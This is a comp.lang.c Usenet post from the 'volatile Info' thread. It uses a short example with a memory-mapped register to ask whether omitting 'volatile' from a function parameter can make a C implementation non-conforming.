Run any checks to verify the package is valid and meets quality criteria. such as a JAR. Description Validate the project is correct and all necessary information is available. Copy and process the resources into the destination directory. for use as a dependency in other projects locally. Post-process the generated files from compilation. Compile the source code of the project. Compile the test source code into the test destination directory Run tests using a suitable unit testing framework. Done in an integration or release environment. Perform actions required before integration tests are executed. Process the test source code. These tests should not require the code be packaged or deployed. for example to do byte code enhancement on Java classes. Process the source code. 286 . This may including cleaning up the environment. ready for packaging. for example to filter any values.3. Take the compiled code and package it in its distributable format. This may involve things such as setting up the required environment.Better Builds with Maven B. Copy and process the resources into the test destination directory. Generate resources for inclusion in the package. for example to filter any values. Install the package into the local repository. Generate any test source code for inclusion in compilation. Perform actions required after integration tests have been executed.. copies the final package to the remote repository for sharing with other developers and projects. Process and deploy the package if necessary into an environment where integration tests can be run. Create resources for testing. Generate any source code for inclusion in compilation.
apache. Sun Developer Network .org/Deploying+to+a+running+container Cargo Plugin Configuration Options .apache. Bibliography Online Books des Rivieres.net/config.sf.org/Containers Cargo Container Deployments .org/eclipse/development/java-api-evolution. Jim.org/ Checkstyle .html Bloch.codehaus.codehaus. Effective Java.codehaus.org/axis/java/ AxisTools Reference Documentation .org/Merging+WAR+files Cargo Reference Documentation .sun. Axis Tool Plugin .codehaus.codehaus.html 287 .. Evolving Java-based APIs. Web Sites Axis Building Java Classes from WSDL Cargo Merging War Files Plugin . 2001. June 8. Joshua.codehaus. Cargo Containers Reference . J2EE Specification . Clirr .apache.html Xdoclet2 .net/ EJB Plugin Documentation .codehaus. PMD Best Practices .com.au/products/simian/ Tomcat Manager Web Application . 288 .net/bestpractices.apache.apache.0-doc/manager-howto.html XDoclet Maven Plugin .html Introduction to the Build Life Cycle – Maven .html Jester .org Maven Downloads . XDoclet Reference Documentation Mojo .maven. Clover Plugin .org/plugins/maven-clover-plugin/ DBUnit Java API .com Introduction to Archetypes .org/download.net/xdoclet/ant/xdoclet/modules/ejb/EjbDocletTask.html Xdoclet .org/ Simian . Cobertura . POM Reference . XDoclet EjbDocletTask .sourceforge. ibiblio.html Maven Plugins .sourceforge. Maven 2 Wiki .redhillconsulting.net/howtomakearuleset.html Ruby on Rails .org/jdiff-maven-plugin Jetty 6 Plugin Documentation .sourceforge.sf.sourceforge.html Jdiff . XDoclet2 Maven Plugin .Better Builds with Maven Checkstyle Available Checks .ibiblio.html PMD Rulesets .
Edward V. 107. 103-105. 190 B Bentley. 90-99. 286 Butler. 86. 111. 63-65. 87. 59 APT format 79 archetypes creating standard project 233. 224 Continuum continuous integration with 218. 194-198 code improving quality of 202-205 restructuring 264 code restructuring to migrate to Maven 264 Codehaus Mojo project 134. 43 tests 254. 55. 129. 135. 62. 129. 61. 57. 131. Jon 37 Berard. 186. 69. 130 Changes report 182 Checkstyle report 181. 222-233 creating standard project 234. 166 collaborating with teams introduction to 207 issues facing teams 208. 220. 116. 209 setting up shared development environments 209-212 Community-oriented Real-time Engineering (CoRE) 208 compiling application sources 40. 100. 84 managing dependencies 61. 61. 144. 84 modules 56 preparing a release 236-240 project inheritance 55. 126-132 creating 55-59. Samuel 167 289 . 101-110. Christopher 25 Ant metadata syntax 279-281 migrating from 241-264 Apache Avalon project 193 Commons Collections 254 Commons Logging library 252 Geronimo project 86.Index A Alexander. 80-82. 193 Clancy. 112. 202-205 Cobertura 181. 55 bibliography 287. 245. 160. 124. 83 creating a Web site for 78. 95. 114-122. 63. 122. 269. 255 Confluence format 79 container 62. 48. 84 DayTrader 86-88. 124. 268. 134-136. 235 conventions about 26 default 29 default build life cycle 286 Maven’s super POM 285 naming 56 single primary output per project 27 standard directory layout for projects 27 standard directory structure 284 standard naming conventions 28 copy/paste detection report 190 CPD report 181. 76. 165. 77. 215. 23. 97 HTTPd 212 Maven project 134. 234 definition of 39 artifactId 29. 163. 191. 166 Software Foundation 22. 50-52 preventing filtering of resources 52 testing 35 clean life cycle 270 Clirr report 182. 213. Tom 207 classpath adding resources for unit tests 48 filtering resources 49-51 handling resources 46. 41 main Spring source 250-254 test sources 42. 59. 288 binding 134. 112. 117. 84. 112. 90 deploying 55. 152. 252 ASF 23 aspectj/src directory 243 aspectj/test directory 243 C Cargo 103-105. 114. 217 Tomcat 212 application building J2EE 85-88. 74. 184. 84 Separation of Concerns (SoC) 56 setting up the directory structure 56. 271 build life cycle 30. 41.
87 building a Web module 105-108 organizing the directory structure 87. 91-99. 182. 77 to the file system 74 with an external SSH 76 with FTP 77 with SFTP 75 with SSH2 75 development environment 209-212 directories aspectj/src 243 aspectj/test 243 m2 244. 245 mock 243 my-app 39 src 40. 184. Albert EJB building a project canonical directory structure for deploying plugin documentation Xdoclet external SSH 21 95-99 95 103-105 99 100.lang. 124. 252 H Hansson. 90 Quote Streamer 87 default build life cycle 41. 185 JDK 248 290 .Object 29 mojo metadata 278-281 Spring Framework 242-246. David Heinemeier hibernate3 test 26 248 I IBM improving quality of code internal repository 86 202. 243. 88.xml 39. 127. 124 deploying applications methods of 74. 69.Better Builds with Maven D DayTrader architecture 86. 245. 245 standard structure 284 test 243. 47. 101 76 F Feynman. 286 conventions 29 location of local repository 44 naming conventions 56 pom. 76. 204. 101-110. 245 tiger 258. 112. 261 tiger/src 243 tiger/test 243 directory structures building a Web services client project 94 flat 88 nested 89 DocBook format 79 DocBook Simple format 79 E Einstein. 129-132 Java description 30 java. 125 Geronimo specifications JAR 107 testing applications 126. 114122. Richard filtering classpath resources preventing on classpath resources FindBugs report FML format FTP 133 49-51 52 194 79 77 G groupId 29. 126-132 deploying applications 122. 124. 49-51 structures 24 dependencies determining versions for 253 locating dependency artifacts 34 maintaining 199-201 organization of 31 relationship between Spring modules 243 resolving conflicts 65-68 specifying snapshot versions for 64 using version ranges to resolve conflicts 65-68 Dependency Convergence report 181 Deployer tool 122. 34. 205 212 J J2EE building applications 85-88. 250 url 30 Java EE 86 Javadoc class-level annotations 278 field-level annotations 279 report 181. 259.
286 developing custom 135. 48-51. 166 artifact guideline 87 build life cycle 30. 156-163 basic development 141. Helen 85 L life cycle default for jar packaging local repository default location of installing to requirement for Maven storing artifacts in locating dependency artifacts 266. 142. 245 Maven Apache Maven project 134. 245 135 134-136 137. 138 291 . 277-281 phase binding 134-136 requiring dependency resolution 155 writing Ant mojos to send e-mail 149-152 my-app directory 39 K Keller. 40 default build life cycle 69. 146-148. 144-163. 223-240 compiling application sources 40. 142. 41 configuration of reports 171-174 creating your first project 39. 136 developing custom plugins 133-140. 154. 32-35 26 P packaging parameter injection phase binding plugin descriptor 30. 53 groupId 34 integrating with Cobertura 194-198 JDK requirement 248 life-cycle phases 266. 45 32 35 35 M m2 directory 244. 267 migrating to 241-254 naming conventions 56 origins of 23 plugin descriptor 137 plugin descriptor 138 preparing to use 38 Repository Manager (MRM) 213 standard conventions 283-286 super POM 285 using Ant tasks from inside 261. 41 collaborating with 207-221.Index Jester JSP JXR report 198 105 181-183 McIlroy. 267 136 44 44. 150-152 capturing information with Java 141-147 definition of 134 implementation language 140 parameter expressions 272-275.. 79 getting started with 37-46.. 30. 165 documentation formats for Web sites 78. 144.
250 40. 181 separating from user documentation 174-179 standard project information reports 81 292 V version version ranges 30. 193 Clirr 182. 202-205 configuration of 171-174 copy/paste detection 190 CPD 181. 184 Dependency Convergence 181 FindBugs 194 Javadoc 181. 194. 237-239. 186-188. 190 selecting 180. 101. 135 using 53. 177179. 134 developer resources 265-274. 106-109. 183-185. 284 preparing to use Maven 38 profiles 55. 188-191. 170. 184. 165 development tools 138-140 framework for 135. 171. 124. 229. 103. 65-68 W Web development building a Web services client project 91-93. 172-174. 245 75 169. 221. 255 248 243 194-198 256 243 243 79 Q Quote Streamer 87 R releasing projects 236-240 reports adding to project Web site 169-171 Changes 182 Checkstyle 181. 206. 170. 72-74 project assessing health of 167-180. 84 monitoring overall health of 206 project management framework 22 Project Object Model 22 Surefire 169. 126. 66. 285 tiger 260 pom. 88-90. 194 repository creating a shared 212-214 internal 212 local 32. 117 improving productivity 108. 144-153. 192. 191. 142. 193-206 inheritance 55. 204. 63. 92. 115. 181. 198 Tag List 181. 190 POM 22. 185 JavaNCSS 194 JXR 181-183 PMD 181. 203. 182-184. 134. 230. 110-112. 117-122 deploying Web applications 114. 245 42. 196. 252 55. 35 manager 213 types of 32 restructuring code 264 Ruby on Rails (ROR) 288 running tests 256 S SCM SFTP site descriptor site life cycle snapshot Spring Framework src directory SSH2 Surefire report 35. 174. 230. 61. 64. 242-246. 187-189. 193. 137-140. 96. 186. 172-174. 129. 127. 236-239 75 81 271 55. 226. 215. 186. 43 254. 190 creating source code reference 182. 194 243. 197. 39. 235. 155-163. 215 creating an organization 215-217 creating files 250 key elements 29 super 29.xml 29. 186-188. 156. 181. 228 35. 70. 97. 243. 197. 227. 54 PMD report 181. 278-281 developing custom 133. 198 T Tag List report test directory testing sources tests compiling hibernate3 JUnit monitoring running tiger/src directory tiger/test directory Twiki format 181. 197. 211. 194. 169. 34. 245. 186. 214. 212. 136 Plugin Matrix 134 terminology 134. 101 102 . 181. 276. 114 X XDOC format Xdoclet XDoclet2 79 100. 59. 123. 182.Better Builds with Maven plugins definition of 28. 234. 193. 173. 194. 186. 113-117. 68.
This action might not be possible to undo. Are you sure you want to continue?
We've moved you to where you read on your other device.
Get the full title to continue listening from where you left off, or restart the preview.
|
https://pt.scribd.com/doc/37780726/BetterBuildsWithMaven-1-0-2
|
CC-MAIN-2016-30
|
en
|
refinedweb
|
public class ServerCloneException extends CloneNotSupportedException
ServerCloneExceptionis thrown if a remote exception occurs during the cloning of a
UnicastRemoteObject.
As of release 1.4, this exception has been retrofitted to conform to
the general purpose exception-chaining mechanism. The "nested
ServerCloneException always throws
IllegalStateException.
UnicastRemoteObject.clone(), Serialized Form
addSuppressed, fillInStackTrace, getLocalizedMessage, getStackTrace, getSuppressed, initCause, printStackTrace, printStackTrace, printStackTrace, setStackTrace, toString
clone, equals, finalize, getClass, hashCode, notify, notifyAll, wait, wait, wait
public Exception detail
This field predates the general-purpose exception chaining facility.
The
Throwable.getCause() method is now the preferred means of
obtaining this information.
public ServerCloneException(String s)
ServerCloneExceptionwith the specified detail message.
s- the detail message.
public ServerCloneException(String s, Exception cause)
ServerCloneExceptionwith the specified detail message and cause..
|
http://docs.oracle.com/javase/7/docs/api/java/rmi/server/ServerCloneException.html
|
CC-MAIN-2016-30
|
en
|
refinedweb
|
Can someone tell me if the following is actually possible, and if it is then
perhaps someone could point me to some code that explains how to do it, if
possible in really simple baby steps. Assume i have next to no knowledge of
tomcat or developing in the java platform at all (the reason being I am new
to this but have over 15 years of development experience and can usually
pick up this stuff very quickly with a few sample files, but it seems
jackrabbit is ever evolving and there is simply not enough sample projects
for people like myself to look at).
I have jackrabbit setup and running. I can access it via, so far so good.
Now I have another application written in java on the same machine that
jackrabbit is running on. I would like to talk to jackrabbit from that
machine. I believe this is possible using JNDI. Is this possible?
There is sample code on the jackrabbit site that states the following...
========================
import javax.jcr.Repository;
import javax.naming.Context;
import javax.naming.InitialContext;
Context context = new InitialContext(...);
Repository repository = (Repository) context.lookup(...);
========================
What goes in the place of the "..."?
I tried the following...
InitialContext ctx = new InitialContext() ;
Context environment = (Context) ctx.lookup("java:comp/env");
Repository repo = (Repository) environment.lookup("jackrabbit.repository");
And also this...
InitialContext ctx = new InitialContext() ;
Repository repo = (Repository) ctx.lookup("jackrabbit.repository");
No luck there either. The reason I am trying "jackrabbit.repository" is
because in my "Tomcat6/jackrabbit" folder is a file called
"bootstrap.properties" that says the "repository.home=jackrabbit.repository"
and also because in my "Tomcat/webapps/jackrabbit/WEB-INF/web.xml" is the
following...
<init-param>
<param-name>repository-name</param-name>
<param-value>jackrabbit.repository</param-value>
<description>Repository Name under which the repository is
registered via JNDI/RMI</description>
</init-param>
Here is my bootstrap.properties file...
java.naming.factory.initial=org.apache.jackrabbit.core.jndi.provider.DummyInitialContextFactory
repository.home=jackrabbitrepo
rmi.enabled=true
repository.config=jackrabbitrepo/repository.xml
repository.name=jackrabbit.repository
rmi.host=localhost
java.naming.provider.url=http\://
jndi.enabled=true
rmi.port=0
I hope someone can help me. Its been 8 days of solid crunching around with
Jackrabbit and I know it can do what I want, its just a matter of trying to
keep digging at it with my blunt spoon (or at the moment its more like
trying to break into a bank vault full of nice yummy gold by smashing my
head against the safe door). I will persist though since I think it is great
technology and just needs a bit more documentation.
Cheers,
Kent.
--
View this message in context:
Sent from the Jackrabbit - Users mailing list archive at Nabble.com.
|
http://mail-archives.apache.org/mod_mbox/jackrabbit-users/200908.mbox/%3C25101779.post@talk.nabble.com%3E
|
CC-MAIN-2016-30
|
en
|
refinedweb
|
Hi all, I'm new at Python, and I've got a few questions.. First I'll explain what i'm trying to do: I'm writing a win32 application that needs a script interpreter to extend functionality (duh). I want the program to be only 1 binary, so I have to link it into the executable, I read the FAQ about the module importing problem, and that's not going to be a problem, because I don't want to use any external modules. I only want the interpreter, and no libraries/modules. I know I'm going to loose a lot of functionality this way, but that's not going to be much of a problem. The scripting isn't going to perform any complicated tasks, and besides, I want complete control over the script. I want to limit the scripts input/output to only my API. And if I ever need the external modules in the future, I'll see what I can do about it then. Another problem is, that I'll be loading multiple source files, so I have to put those into different namespaces, to avoid clashes. I don't think that this is such a big problem. I just haven't looked into this yet. So, to sum it up: - Getting rid of all the modules, so I only have the Interpreter. - Being able to set the namespace of a particular piece of code. Any hints / tips are greatly appreciated. Yours, Jean-Paul Kogelman Parox Software b.v.
|
https://mail.python.org/pipermail/python-list/2000-November/050866.html
|
CC-MAIN-2016-30
|
en
|
refinedweb
|
plone.jsonapi.routes 0.2
Plone JSON API -- Routes
plone.jsonapi.routes
Table of Contents
Introduction
This is an add-on package for plone.jsonapi.core which provides some basic URLs for Plone standard contents (and more).
Motivation
The routes package is built on top of the plone.jsonapi.core package to allow Plone developers to build modern (JavaScript) web UIs which communicate through a RESTful API with their Plone site.
Compatibility
The plone.jsonapi.routes is compatible with Plone 4.
Installation
The official release is on pypi, so you have to simply include plone.jsonapi.routes to your buildout config.
Example:
[buildout] ... [instance] ... eggs = ... plone.jsonapi.core plone.jsonapi.routes
The routes for the standard Plone content types get registered on startup.
API URL
After installation, the Plone API routes are available below the plone.jsonapi.core root URL (@@API) with the base /plone/api/1.0, for example.
Note
Please see the documentation of plone.jsonapi.core for the API root URL.
There is also an overview of the registered routes which can be accessed here:
API Routes
This is an overview of the provided API Routes. The basic content routes provide all an interface for CRUD operations.
Important
the optional UID of the create, update and delete URLs is to specify the target container where to create the content. If this is omitted, the API expects a parameter parent_uid in the request body JSON. If this is also not found, an API Error will be returned.
Request Parameters
All GET resources acceppt request parameters.
Examples
Search all content created by admin
Search for all documents created by admin which contain the text Open-Source
Response Format
The response format is for all resources the same.
Example:
{ url: "", count: 0, _runtime: 0.0021538734436035156, items: [ ] }
- url
- The resource root url
- count
- Count of found results
- _runtime
- The processing time in milliseconds after the request was received until the respone was prepared.
- items
- An array of result items
Content URLs
All content informations are dynamically gathered by the contents schema definition through the IInfo adapter. It is possible to define a more specific adapter for your content type to control the data returned by the API.
Special URLs
Beside the content URLs described above, there are some other resources available in this extension.
Write your own API
This package is designed to provide an easy way for you to write your own JSON API for your custom Dexterity content types.
The plone.jsonapi.example package shows how to do so.
Example
Lets say you want to provide a simple CRUD JSON API for your custom Dexterity content type. You want to access the API directly from the plone.jsonapi.core root URL ().
First of all, you need to import the CRUD functions of plone.jsonapi.routes:
from plone.jsonapi.routes.api import get_items from plone.jsonapi.routes.api import create_items from plone.jsonapi.routes.api import update_items from plone.jsonapi.routes.api import delete_items
To register your custom routes, you need to import the router module of plone.jsonapi.core. The add_route decorator of this module will register your function with the api framework:
from plone.jsonapi.core import router
The next step is to provide the a function which get called by the plone.jsonapi.core framework:
@router.add_route("/example", "example", methods=["GET"]) def get(context, request): return {}
Lets go through this step by step…
The @router.add_route(…) registers the decorated function with the framework. So the function will be invoked when someone sends a request to @@API/example.
The framework registers the decorated function with the key example. We also provide the HTTP Method GET which tells the framework that we only want to get invoked on a HTTP GET request.
When the function gets invoked, the framework provides a context and a request. The context is usually the Plone site root, because this is where the base view (@@API) is registered. The request contains all needed parameters and headers from the original request.
At the moment we return an empty dictionary. Lets provide something more useful here:
@router.add_route("/example", "example", methods=["GET"]) def get(context, request=None): items = get_items("my.custom.type", request, uid=None, endpoint="example") return { "count": len(items), "items": items, }
The get_items function of the plone.jsonapi.routes.api module does all the heavy lifting here. It searches the catalog for my.custom.type contents, parses the request for any additional parameters or returns all informations of the “waked up” object if the uid is given.
The return value is a list of dictionaries, where each dictionary represents the information of one result, be it a catalog result or the full information set of an object.
Note
without the uid given, only catalog brains are returned
Now we need a way to handle the uid with this function. Therefore we can simple add another add_route decorator around this function:
@router.add_route("/example", "example", methods=["GET"]) @router.add_route("/example/<string:uid>", "example", methods=["GET"]) def get(context, request=None, uid=None): items = get_items("my.custom.type", request, uid=uid, endpoint="example") return { "count": len(items), "items": items, }
This function handles now URLs like @@API/example/4b7a1f… as well and invokes the function directly with the provided UID as the parameter. The get_items tries to find the object with the given UID to provide all informations of the waked up object.
Note
API URLs which contain the UID are automatically generated with the provided endpoint
The CREATE, UPDATE and DELETE functionality is basically identical with the basic VIEW function above, so here in short:
# CREATE @router.add_route("/example/create", "example_create", methods=["POST"]) @router.add_route("/example/create/<string:uid>", "example_create", methods=["POST"]) def create(context, request, uid=None): items = create_items("plone.example.todo", request, uid=uid, endpoint="example") return { "count": len(items), "items": items, } # UPDATE @router.add_route("/example/update", "example_update", methods=["POST"]) @router.add_route("/example/update/<string:uid>", "example_update", methods=["POST"]) def update(context, request, uid=None): items = update_items("plone.example.todo", request, uid=uid, endpoint="example") return { "count": len(items), "items": items, } # DELETE @router.add_route("/example/delete", "example_delete", methods=["POST"]) @router.add_route("/example/delete/<string:uid>", "example_delete", methods=["POST"]) def delete(context, request, uid=None): items = delete_items("plone.example.todo", request, uid=uid, endpoint="example") return { "count": len(items), "items": items, }
See it in action
A small tec demo is available on youtube:
Changelog
0.2 - 2014-03-05
FIXED ISSUES
-: Dexterity support
-: Update on UID Urls not working
-: Started with some basic browsertests
API CHANGES
API root url provided.
Image and file fields are now rendered as a nested structure, e.g:
{ data: b64, size: 42, content_type: "image/png" }
Workflow info is provided where possible, e.g:
{ status: "Private", review_state: "private", transitions: [ { url: ".../content_status_modify?workflow_action=submit", display: "Puts your item in a review queue, so it can be published on the site.", value: "submit" }, ], workflow: "simple_publication_workflow" }
0.1 - 2014-01-23
- first public release
- Author: Ramon Bartl
- License: MIT
- Categories
- Package Index Owner: ramonski, jdinuncio
- DOAP record: plone.jsonapi.routes-0.2.xml
|
https://pypi.python.org/pypi/plone.jsonapi.routes/0.2
|
CC-MAIN-2016-30
|
en
|
refinedweb
|
Easier Immutable Objects in C# and VB
- |
-
-
-
-
-
-
-
Read later
My Reading List
A common pain point in .NET programming is the amount of boilerplate code necessary to implement immutable objects. Unlike a normal class, and immutable class requires that each property have an explicitly defined backing store. And of course a constructor is needed to tie everything together.
Under a new draft specification, C# and VB will be adding what they are calling a “record class”. This is essentially an immutable class defined solely by its constructor. Here is an example from the specification:
public record class Cartesian(double x: X, double y: Y);
In addition to the constructor, the compiler will automatically create:
- A read-only property for each parameter
- An Equals function
- A GetHashCode override
- A ToString Override
- An “is” Operator, known as “Matches” in VB
The “is/Matches” operator is used in pattern matching, which we will cover in tomorrow’s article. Aside from that, record classes are a lot like C# anonymous types. (VB anonymous types differ in that they are mutable by default.) Microsoft is looking into ways to reconcile the two concepts, especially given the current limitation about not exposing anonymous types beyond their current assembly.
A common feature of immutable types is the ability to create copies of the object with one or more fields updated. Though not in the specification yet, here is one option they are considering for C#.
var x1 = new MyRecord(1, 2, 3);
var x2 = x1 with B: 16;
Console.WriteLine(x2) // prints something like "A = 1, B = 16, C = 3"
Extending Record Classes
In the Cartesian example class, you may have noticed that it ended with a semi-colon. This is to indicate that the class has no body other than what the compiler provides.
Instead of the semi-colon you can provide a set braces like you would for a normal class. You would still get the same compiler-generated code, but have the ability to add additional properties and methods as you see fit.
Other Limitations
For the time being only record classes are supported. In theory, record structs could be added using the same basic syntax and concepts.
Library Concerns
A serious limitation of immutable types in .NET is the lack of library support. Imagine that you are a middle tier developer. Your normal day-to-day tasks probably involve asking an ORM for some objects out of the database, which you then serialize as SOAP-XML or JSON for a one-way or round-trip to the client.
Currently most ORMs and serializers don’t have support for immutable types. Instead, they assume there will be a parameterless constructor and mutable properties. If this issue isn’t resolved in the more popular frameworks, record classes will be of little use in most projects.
For more information, see the draft specification Pattern Matching for C#. A prototype should be available in a few weeks.
Correction: This report erroneously stated that this feature would be part of C# 6 and VB 12.
Joe Enos
Maybe a static Record.FromXml(string xml) method with a generic parameter representing the specific record class (and another one for JSON, IDataReader, DataRow, IDictionary, FormCollection, etc.). As long as the names in the raw data line up to the properties, these should be pretty easy to build with a little reflection.
If they build enough of these translators, then I'd expect any third party library that does normal object hydration could be easily extended or enhanced to use these record classes.
Not sure I like the "with" syntax though - seems to me like it would be confusing to look at. If they can find a way to use more traditional code, it might look something like:
// instead of
var x2 = x1 with B: 16;
// maybe one of these
var x2 = x1.Copy(new { B = 16 });
var x2 = x1.Copy(o => { o.B = 16; });
var x2 = Record.CreateCopyFrom(x1, B: 16);
Time to take a look at F#
by
Arturo Hernandez
I can't really list all the benefits here but, if you are reading this article chances are you should take a look at F#.
Library concerns
by
Roger Alsing
Since this is immutable types, you will not use them for "fat" entities, since they are not mutable.
So the only thing you could use them for in an ORM, is projections, and the libs do support selecting projections.
e.g.
.Select(e => new MyRecord(e.Name,e.Age));
So, it will still be of good use if you need projections with known types instead of anonymous types.
Looks great!
by
Ian Yates
I've been able to teach JSON.Net how to handle these objects without too much fuss as well.
When my code assistance tool (at the moment Telerik's JustCode because I get it with the GUI components subscription I already have with them) catches up with these new C# features I'll happily jump ship for new code and gradually shift over my old code.
Re: Time to take a look at F#
by
Isaac Abraham
Looks like C# is slowly but surely morphing into F# with a C# syntax
by
Phylos Zero
Explicitly defined backing store?
by
Craig Wagner
Perhaps I'm just being dense here, but I don't understand why today each property requires an explicit backing store. For instance:
public class Point
{
public int X { get; private set; }
public int Y { get; private set; }
public Point( int x, int y )
{
X = x;
Y = y;
}
}
Granted it's still more code than the example shown in the article, but this code does not declare explicit backing store variables yet once the object is created X and Y cannot be changed (other than using reflection of course). What am I missing?
Re: Explicitly defined backing store?
by
Jonathan Allen
|
https://www.infoq.com/news/2014/08/Record-Class
|
CC-MAIN-2016-30
|
en
|
refinedweb
|
Ok, well I attempted another exercise in the book. It was to 'Write a program that reads in a sequence of positive numbers and prints out the total and average value. The end of the sequence should be signalled by entering -1'.
This is what I came up with:
Only when I enter -1 it messes up and says an error log is being created :(Only when I enter -1 it messes up and says an error log is being created :(Code:
#include <iostream.h>
int main()
{
int x, y = 0, z = 0;
while(x != -1)
{
x = 0;
cout << "Enter a number: ";
cin >> x;
z++;
y = x + y;
}
y = y + 1;
cout << "The average of those numbers is " << y / z;
}
Thanks if you can help
-Marlon
|
http://cboard.cprogramming.com/cplusplus-programming/78098-another-problem-printable-thread.html
|
CC-MAIN-2016-30
|
en
|
refinedweb
|
Looks like interesting work. How does this differ from the already existing Time library?
Was looking at your code, alvarojusten, saw the function to represent the day of week as a string. Don't know if you noticed, but all the clock does in increment the day of the week by one (rolling from 7 to 1) every time it hits midnight. It does *not* seem to have any fixed association between the date/month/year and what day of the week it is. Convenient in some ways as you are perfectly able to define 1=Sunday, 1=Monday... or 1=Thursday for that matter (if you can get the hang of Thursdays...).Similarly, it is perfectly happy to let you set the date to Feb 30... and then it continues to the 31st. Seems to know if the current m/d/y is the last day of the month -- and if so, it will roll to the next month at midnight. But it won't force the date to be valid for the month/year.
Had a chance to learn Git and put what I've done up at goal in creating yet another DS1307 library was to provide easy access to some of the other functions I needed from the chip, specifically its square wave output (for an interrupt) and its battery-backed RAM (to allow configuration info to persist across restarts of the Arduino. (It's annoying, but I suppose necessary, that the Arduino restarts every time you open the Serial Monitor.)I've included an example sketch which allows you to set most everything interactively from the Serial Monitor. Also a Fritzing board based on the Sparkfun module.
(the Time library has) a lot of features that I don't need (NTP, time deltas etc.)
The Time library also "polutes" the namespace since it add a lot of functions (hour(), minute() etc.) instead of creating a class, instantiate it etc.
Please enter a valid email to subscribe
We need to confirm your email address.
To complete the subscription, please click the link in the
Thank you for subscribing!
Arduino
via Egeo 16
Torino, 10131
Italy
|
http://forum.arduino.cc/index.php?topic=59256.msg496464
|
CC-MAIN-2016-30
|
en
|
refinedweb
|
Details
- Type:
Improvement
- Status: Closed
- Priority:
Minor
- Resolution: Fixed
- Affects Version/s: 4.7
-
- Component/s: modules/analysis
-
- Lucene Fields:New, Patch Available
Description
Add a TokenFilter that strips characters after an apostrophe (including the apostrophe itself).
Activity
- All
- Work Log
- History
- Activity
- Transitions
+1, i saw your paper (very nice) on this and think it would be a great addition to lucene!
This patch adds a new TokenFilter named ApostropheFilter.
Thank you for your interest Robert Muir ! Here is the paper in case anyone interested. It's more like a solr writeup though.
Hi,
your patch contains unrelated changes in analysis' modules root folder (adding of a useless classpath). Can you fix this?
Also, because you add new functionality, TurkishAnalyzer should only add the new TokenFilter, if matchVersion is at least LUCENE_48.
It is possible to achieve described behavior with following existing filters. (without a custom filter) Any thoughts on which way is preferred?
<filter class="solr.PatternReplaceFilterFactory" pattern="(.*)'(.*)" replacement="$1"/>
<filter class="solr.PatternCaptureGroupFilterFactory" pattern="(.*)'" preserve_original="false" />
I prefer the explicit filter you have now!
This should also work:
<filter class="solr.PatternReplaceFilterFactory" pattern="'(.*)" replacement=""/>
Thanks for looking into this Uwe Schindler. I wanted to use QueryParser in TestTurkishAnalyzer.java but I am not familiar with ant. I want to include a checkMatch(String text, String qString) method that checks this : "this query string" should retrieve "this document text"
I added this but not sure this is correct.
<path id="classpath"> <path refid="base.classpath"/> <pathelement path="${queryparser.jar}"/> </path>
Generally speaking its enough to just do assertAnalyzesTo/tokenStreamContents in unit tests. it keeps everything simple and easier to debug than integration-like tests.
Thats why we don't depend on queryparser in any of the tests today.
We should not add an additional dependency to the query parser module! I would remove this test, we generally don't add such type of tests. Use BaseTokenStreamTestCase as base class for your test and use the various assert methods to check if the token stream is what you expect. Feeding IndexWriter with your tokens and executing a search is not really a "unit test" anymore. We have enough tests for the indexing.
useless class path chance and test case removed.
This looks great Ahmet: As Uwe mentioned, i think the only change we need is the condition in TurkishAnalyzer:
if matchVersion.onOrAfter(Version.LUCENE_48) { // do new stuff, include the new filter } else { // do old stuff }
Otherwise, this change looks ready to me.
Oh one other thing that would be nice, if you could add some javadocs to the public classes?
The factories typically have an example of its use (see some of the others). For the filter itself, maybe just a simple description of what it does, and a reference to your paper would be good (since you have done experiments and so on).
if matchVersion.onOrAfter(Version.LUCENE_48)
I tried this but there is no LUCENE_48 in trunk.
Thats a bug. I will take care of it right now!
Commit 1573059 from Robert Muir in branch 'dev/trunk'
[ ]
LUCENE-5482: add missing constant
Commit 1573061 from Robert Muir in branch 'dev/branches/branch_4x'
[ ]
LUCENE-5482: remove wrong text from this, its not the latest
Thanks for pointing that out, you should see the constant now.
Java doc for public classes added
Version.LUCENE_48 check added to TurkishAnalyzer
Should we add this if check to TestTurkishAnalyzer too?
if(matchVersion.onOrAfter(Version.LUCENE_48)) // check apostrophes
No its ok, because we only instantiate analyzers with the latest version
Great, Thanks for guidance and comments!
Commit 1573066 from Robert Muir in branch 'dev/trunk'
[ ]
LUCENE-5482: Improve default TurkishAnalyzer
Cool, thanks!
+1 to commit
Commit 1573074 from Robert Muir in branch 'dev/branches/branch_4x'
[ ]
LUCENE-5482: Improve default TurkishAnalyzer
Thanks Ahmet!
I made one addition: I also inserted this filter into the text_tr chain in the solr example.
Close issue after release of 4.8.0
This is similar to ClassicFilter that removes 's from the end of words. But ClassicFilter is useful for English language only and has nothing to do with Turkish. Because it only removes 's and 'S. In Turkish different character sequences may come after an apostrophe. e.g. 'nin, 'a, 'nin, 'ü etc.
In Turkish, apostrophe is used to separate suffixes from proper names (continent, sea, river, lake, mountain, upland, proper names related to religion and mythology). For example Van Gölü’ne (meaning: to Lake Van).
|
https://issues.apache.org/jira/browse/LUCENE-5482
|
CC-MAIN-2016-30
|
en
|
refinedweb
|
Re: volatile Info
- From: crisgoogle <crisgoogle@xxxxxxxxx>
- Date: Fri, 6 Aug 2010 14:24:27 -0700 (PDT)
On Aug 6, 12:22 pm, Keith Thompson <ks...@xxxxxxx> wrote:.
First off, I totally agree that this is all rather academic unless
you actually own a DS9K.
And I can't quite put my finger on what I'm trying to get at here,
so bear with me =)
Let's say that there _is_ some mechanism by which an object's value
may change, independently of what the abstract machine would otherwise
dictate. Modifying your example above:
<code>
/* assume that this is an implementation-defined memory-mapped
register that _ought_ to be treated as volatile. */
int *reg = 0x4000
#include <stdlib.h>
/* The parameter here _ought_ be declared as volatile. */
int square(int *x) {
return *x * *x;
}
int main(void) {
*reg = 10;
return square(reg) == 100 ? EXIT_SUCCESS : EXIT_FAILURE;
}
</code>
(I think I got that right).
In parallel to your explanation with your original example, I think
you're suggesting that the implementation is non-conforming if
this program returns EXIT_FAILURE.
Does this code exhibit undefined behaviour? Unless I made a mistake
or missed something, I don't think so (ignoring overflow,
as usual).
So it seems peculiar to me that the programmer can render the
implementation non-conforming by omitting the volatile in the
declaration of square().
.
- Follow-Ups:
- Re: volatile Info
- From: Keith Thompson
- References:
- volatile Info
- From: manu
- Re: volatile Info
- From: Shao Miller
- Re: volatile Info
- From: Scott Fluhrer
- Re: volatile Info
- From: Seebs
- Re: volatile Info
- From: crisgoogle
- Re: volatile Info
- From: Malcolm McLean
- Re: volatile Info
- From: crisgoogle
- Re: volatile Info
- From: Keith Thompson
